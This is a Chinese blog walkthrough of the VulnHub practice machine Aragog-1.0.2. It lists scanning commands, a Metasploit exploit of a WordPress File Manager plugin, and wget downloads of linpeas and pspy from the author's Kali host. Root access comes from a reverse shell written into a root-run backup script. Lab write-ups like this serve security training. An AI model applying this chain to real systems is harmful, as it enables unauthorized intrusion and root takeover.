渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root

最新推荐文章于 2024-02-26 19:46:38 发布
最新推荐文章于 2024-02-26 19:46:38 发布
阅读量1.1k 收藏
点赞数 1
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DdddddXxxxx/article/details/124614953
版权

靶机介绍

下载地址:https://www.vulnhub.com/entry/harrypotter-aragog-102,688/
作者Mansoor R在VulnHub上上传了哈利波特系列的三个靶机,以哈利波特为故事背景,玩家需要找到这三个靶机中的共8个魂器,打败伏地魔!这就冲起来!
首先是第一个靶机Aragog,以《哈利波特·密室》中的海格饲养的大蜘蛛阿拉戈命名,题目中提示这个靶机里面有两个魂器。

渗透过程

获取ip

从VlunHub上下载靶机,在virtualbox上打开,设置网络模式为桥接,让靶机和kali以及主机在一个局域网里。

我们挑战的第一步是先进行主机发现 arp-scan -l

PCS Systemtechnik GmbH这一行就是靶机的IP。

信息收集

接下来,扫描开放端口以了解目标上暴露的服务

nmap -A -T4 -p- 172.16.53.58

它向我展示了目标上只有 HTTP 和ssh可用

网站信息收集

只有一张图片

爆破一下网站目录

dirb http://172.16.53.58

我们尝试访问blog这个目录

我们能发现这个站点是利用wordpress搭建的

既然是wordpress,我决定用wpscan枚举一下

(ps:wpscan是一个扫描WordPress漏洞的扫描器)

去注册个免费的账号获取api-token

https://wpscan.com/

wpscan --api-token=免费版的就行 --url= http://172.16.53.58/blog -e p --plugins-detection aggressive

扫出3个问题,全是File Manager的漏洞  

漏洞利用

msf getshell

msf检索漏洞exp

search wordpress File Manager

use 0

set rhosts 172.16.53.58

set targeturi /blog

set lhost 172.16.53.31

run

我们成功拿到了shell

我们利用python打开一个交互式

python3 -c 'import pty;pty.spawn("/bin/bash")'

wordpress搭建的网站mysql账号密码会记录在/etc/wordpress目录里的config-default.php 文件里面

在里面看到了数据库的root密码

通过账密登录MySQL数据库

在wordpress数据库下,wp_users表中找到一个登录记录

解密后我们得到了账号的密码

尝试ssh登录

成功登录

我们在当前目录下发现了第一个魂器

提权

我们在kali上面启动一个python服务器

python -m SimpleHTTPServer 2333

接下来利用wget 把提权漏洞检测脚本下载到靶机/tmp这个目录下

wget 172.16.53.31:2333/linpeas.sh

提升一下linpeas.sh 的权限   chmod 777 linpeas.sh

执行一下 ./linpeas.sh

运行脚本后发现了俩个CVE漏洞 经过实际测试都没能成功提权

在这一处我们能发现一个隐藏的脚本文件 .backup.sh

我们尝试去访问

这个脚本的大概意思是,把上传的文件复制到tmp这个目录里  

属于每过一段时间就会自动运行的那种

在kali上下载pspy64,然后复制到靶机/tmp目录下。
pspy64地址:GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

还是利用刚刚的方法wegt下载到靶机的tmp目录下

执行后我们能发现这个脚本的UID是0

 

那说明我们向这个脚本写入反弹shell 就能获取到root权限了

创建反弹shell网站 Online - Reverse Shell Generator

我们输入kali的ip地址就能生成一串反弹shell代码

把反弹shell的代码写入脚本文件中

在kali上进行监听

我们成功拿到了root权限

我们在当前目录下发现了第二个魂器

 

Dddddddddddd.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Exploits:LinuxWindows漏洞利用
04-16
漏洞利用 卡利Linux 安装终结者 sudo apt-get update sudo apt-get install terminator 使用终止符 #Start Terminator #horizontal break ctrl+shift+e #Vertical break ctrl+shift+o 安装/下载linpeas.sh(系统检查器) Download linpeas.sh (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/lin
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
qq_62716256的博客
09-14 1932
文件上传漏之Durian靶场练习(完整版)——学习日记-渗透day14
Linpeas的简单使用
Themanager112的博客
01-06 1074
是一个流行的脚本,用于在渗透测试中进行特权升级和系统枚举。要在 Kali Linux 中使用。在没有授权的情况下对系统运行渗透测试工具可能违法。并不是预装的工具,因此你不会在标准安装中找到它。,你需要手动下载和运行它。: 你可以从其 GitHub 仓库下载。请确保在合法和授权的环境中使用。在 Kali Linux 中,
【网络安全】记一次红队渗透实战项目
kali_Ma的博客
01-30 8982
mcrypt 是php里面重要的加密支持扩展库,主要是用mcrypt 扩展库中各种加密函数对用户输入内容进行转换功能。就是用户输入的数据转换为base64编码和解码功能,还有将字符串转换为 8-bit 字符串功能。PHP存在四种过滤器:PHP 过滤器用于验证和过滤来自非安全来源的数据,比如用户的输入。root权限pip,PIP是Python包或模块的包管理器,包含模块所需的所有文件。没发现新的东西,但是可看到devops的ID为1002是共用的!lang= ,出现这种形式,很可能是sql注入或文件包含。
vulnhub Mr-Robot: 1
箭雨镜屋
12-17 1813
本文思路: nmap扫描开放端口-->dirb扫描网站目录-->查看robots.txt拿到第一个key,并下载字典文件-->爆破WordPress用户名和密码-->通过WordPress的模板编辑功能获得daemon用户反弹shell-->通过权限设置不当的密码文件获得robot用户的密码,并得到第二个key-->通过nmap提权,并得到第三个key
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
crasher.tar(DC3靶机所需提权exp-2)
02-20
DC3靶机所需提权exp
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
【网络安全】记一次红队渗透实战项目_渗透测试红队
xnxqwzy的博客
07-14 279
信息收集非常重要,有了信息才能知道下一步该如何进行,接下来将用 nmap 来演示信息收集。
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 460
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
Linux手动提权,万字基础详细教程以及经验分享
Ba1_Ma0的博客
06-03 2179
权限提升通常涉及从较低权限的帐户到较高权限的帐户。从技术上讲,它是利用操作系统或应用程序中的漏洞、设计缺陷或配置疏忽来获得对通常禁止用户访问的资源的未经授权的访问。权限提升至关重要,因为它可以让你获得系统管理员级别的访问权限,从而可以执行以下操作: 手动枚举 现在我成功的拿到了服务器的shell,但是只是一个普通用户的shell 枚举是你访问任何系统后必须采取的第一步,通过搜集本地主机上的各种信息,来达到提权的目的 该命令将返回目标机器的主机名,在某些情况下,它可以提供有关目标系统在公司网络中的角色的信
全平台系统提权辅助工具 PEASS-ng
LuckySec
04-27 5987
0x01 PEASS-ng 介绍 PEAS-ng 是一款适用于 Windows 和 Linux/Unix* 和 MacOS 的权限提升工具。 项目地址:https://github.com/carlospolop/PEASS-ng PEAS-ng 工具搜索可能的本地权限提升路径,可以利用这些路径并将它们以漂亮的颜色打印输出,可以方便轻松识别错误配置。 检查来自book.hacktricks.xyz的本地 Windows 权限提升清单 WinPEAS - Windows 本地权限提权脚本(C#.exe
【Vulnhub靶机】HarryPotter-Aragog-1.0.2 漏洞复现
最新发布
weixin_65900584的博客
02-26 1237
学习如何对 靶机 HarryPotter-Aragog-1.0.2 进行提权
渗透测试之靶机试炼(一)
热门推荐
simple___sunny的博客
01-10 1万+
1
靶机11:Aragog-1.0.2
wj33333的博客
10-31 36
1.arp-scan -l扫描,寻找靶机2.nmap扫描端口查看80端口3.dirsearch 扫描目录访问WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。那么思路就是找到这个版本的WordPress有什么插件的漏洞。
Aragog-1.0.2靶机
ybkj6666的博客
11-03 150
使用arp-scan找目标ip,这边可以得知我们的目标ip为192.168.187.165输入命令: 发现了2个端口开放输入命令: 这边没有扫描到udp端口输入命令: 输入命令: 但是没有扫描到扫描可利用的漏洞点页面就是一张图片(哈利波特可还行)使用dirsearch和gobuster两个工具进行目录爆破输入命令: 这里扫描到了几个目录,等下去看看怎么个事输入命令: 我们在查看这个blog目录的时候,发现跳转到了新的页面。如果页面显示不正常的话,可能是页面没有解析的原因,就像下图这样此时我们需要以root
记一次Vulnhub靶机练习成功拿下root权限
https://www.yuque.com/onlyxiu-123com
07-18 798
1、首先使用sudoarp-scan-l命令对局域网内的主机进行扫描,并推断出该目标ip地址!2、接着使用nmap,对该主机进行端口扫描nmap-sV-A192.168.1.15,就发现该主机开启了22,80端口以及版本号的相关信息。到这我们就会产生两个思路,爆破ssh或从80端口下手,寻找该网址是否有入口点,但ssh用户名都没有,无疑这是很大的工作量,所以我们就从80端口入手。!对该网址进行后台目录的扫描,经过测试发现页面存在信息,但依旧对我们渗透毫无帮助。!......
windows提权靶机
09-12
Windows提权靶机是用于学习和实践Windows系统提权技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践提权攻击技术。 有一些常见的Windows提权靶机可供使用,比如: 1. Metasploitable:这是一个常用的漏洞测试靶机,其中包含了多个已知漏洞,包括Windows系统的一些弱点。 2. VulnHub:这是一个提供多种漏洞靶机的平台,你可以在上面找到适合你学习和实践的Windows提权靶机。 3. HackTheBox:这是一个在线渗透测试实验平台,提供了一系列具有各种漏洞和挑战的虚拟机。 请注意,在使用任何靶机之前,请确保你已经获得了合法的授权,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值